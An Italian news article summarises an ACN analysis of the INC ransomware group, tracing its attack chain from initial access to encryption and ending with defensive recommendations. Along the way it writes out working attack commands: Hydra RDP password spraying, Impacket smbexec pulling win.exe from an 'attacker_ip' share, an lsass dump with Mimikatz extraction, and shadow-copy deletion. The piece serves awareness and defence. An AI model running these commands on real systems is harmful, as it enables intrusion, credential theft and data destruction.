Negli ultimi mesi, si è osservato con crescente preoccupazione la diffusione di un nuovo attore nel panorama delle minacce digitali: il ransomware INC, emerso a metà 2023 come servizio RaaS (Ransomware-as-a-Service).
Le campagne attribuite a questo gruppo criminale hanno colpito diverse organizzazioni sul territorio nazionale, facendo leva su tecniche note ma ancora troppo efficaci, come brute force, vulnerabilità non patchate e debolezze nei sistemi IAM.
La dettagliata analisi dell’Agenzia per la Cybersicurezza Nazionale (ACN) rivela una sequenza d’attacco che si sviluppa con precisione chirurgica, dalla compromissione iniziale fino alla cifratura dei dati e l’esfiltrazione tramite servizi cloud.
In ambito globale, il gruppo INCransom, ha rivendicato finora 288 attacchi, secondo quanto rilevato dalla piattaforma Ransomfeed.
Vediamo nel dettaglio ogni fase dell’incursione.
Indice degli argomenti
Accesso iniziale: i soliti errori, il solito disastro
Gli attaccanti partono spesso da interfacce di gestione esposte su Internet, senza protezioni adeguate. L’assenza di meccanismi di MFA (autenticazione a più fattori) e credenziali robuste consente a tecniche come il password spraying tramite botnet di aprire la porta principale dell’infrastruttura.
Un esempio pratico di attacco di questo tipo può essere emulato con strumenti come Hydra:
hydra -L utenti.txt -P password_comuni.txt -t 64 rdp://<IP bersaglio>
In alternativa, vengono sfruttate vulnerabilità note su apparati perimetrali non aggiornati (come firewall o VPN), aggirando i controlli di autenticazione tramite exploit pubblici spesso presenti su piattaforme come ExploitDB.
Ricognizione e movimenti laterali: la rete sotto scacco
Una volta ottenuto l’accesso iniziale, gli attaccanti effettuano una ricognizione della rete interna usando strumenti noti e ampiamente disponibili:
- Advanced IP Scanner per la mappatura degli host attivi.
- Impacket SMBExec per l’esecuzione remota di comandi via SMB:
python smbexec.py dominio/utente:password@damianodipietro
Su ogni macchina viene usato il comando quser per individuare utenti con privilegi elevati, seguito da un dump del processo lsass.exe, da cui vengono estratte le credenziali in chiaro o hashate:
procdump -accepteula -ma lsass.exe lsass.dmp
Il dump viene poi processato con Mimikatz per ottenere password in chiaro:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Distribuzione del ransomware: mirato e persistente
Con la rete sotto controllo, gli attaccanti selezionano i target contenenti dati sensibili. Il payload, un file eseguibile chiamato win.exe, viene distribuito nuovamente con Impacket:
python smbexec.py dominio/utente:password@IP -x “copy \
\attacker_ip\win.exe C:\Temp\win.exe && C:\Temp\win.exe”
Il ransomware INC supporta una serie di parametri da riga di comando che permettono una personalizzazione avanzata dell’attacco:
--file <FILE>: cifra solo un file specifico.--mode fast|medium|slow: definisce la profondità della cifratura.--ens,--lhd: includono unità di rete e dischi nascosti.--safe-mode: crea un servizio chiamatodmksvc, forzando il riavvio in modalità provvisoria per eludere gli antivirus.
Un esempio di esecuzione completa potrebbe essere:
win.exe –dir “C:\dati_sensibili” –mode slow –ens –kill –hide –safe-mode
Il malware attende circa 60 secondi prima di agire, usando sleep loop per evitare sandbox e rilevamenti automatici. Successivamente:
- Verifica la presenza di debugger con
IsDebuggerPresent. - Elimina shadow copies con: vssadmin delete shadows /all /quiet
- Disattiva log e controlli, elimina punti di ripristino usando
RmGetListdarstrtmgr.dll. - Applica esclusioni intelligenti a file
.exe,.dll, directory comeWindows,Program Files, e cartelle contenenti “INC” per preservare la propria esecuzione.
La cifratura è realizzata con AES-128 tramite ADVAPI32.dll e la chiave AES viene a sua volta cifrata con RSA (usando CRYPT32.dll), garantendo che solo gli attaccanti possano decifrare i dati.
La nota di riscatto
Il malware crea un’immagine di sfondo (background-image.jpg) con il messaggio di riscatto, un file HTML (INC-README.html) e lo apre automaticamente in Internet Explorer, assicurandosi che la vittima veda il messaggio. Inoltre, stampa la nota se sono presenti stampanti locali:
EnumPrintersW(...)
OpenPrinterW(...)
WritePrinter(...)
Per la double extortion, i dati vengono caricati su MEGA tramite lo strumento rclone, spesso con configurazioni presenti in chiaro sul sistema. Inoltre, viene mantenuto l’accesso remoto con l’installazione furtiva di AnyDesk, rendendo la rimozione del malware più difficile.
Come difendersi: le raccomandazioni dell’ACN
Le contromisure suggerite sono chiare e consolidate:
- Non esporre interfacce di gestione direttamente su Internet.
- Applicare autenticazione multifattore e policy IAM robuste.
- Monitorare il log Windows
SYSTEMper eventi con ID 7045 (creazione sospetta di servizi). - Usare LDAPS anziché LDAP.
- Adottare la segmentazione di rete e accedere solo tramite VPN sicure.
- Eseguire backup offline cifrati e testarne regolarmente il ripristino.
- Prevedere un solido Incident Response Plan.
In caso di compromissione, le azioni urgenti includono:
- Isolamento degli host infetti.
- Collezione delle evidenze forensi.
- Reset delle credenziali.
- Ripristino da backup noti.
- Segnalazione immediata tramite il portale dell’ACN.
L’attacco operato dal ransomware INC dimostra ancora una volta che la superficie d’attacco più vulnerabile è, spesso, quella prevedibile: interfacce esposte, password deboli, sistemi non aggiornati. Gli strumenti usati sono noti, accessibili e spesso open source. L’unica vera difesa è la prevenzione, unita a una costante consapevolezza del rischio.
INC non è il futuro: è il presente e colpisce dove trova trascuratezza. Il tempo di agire è ora.
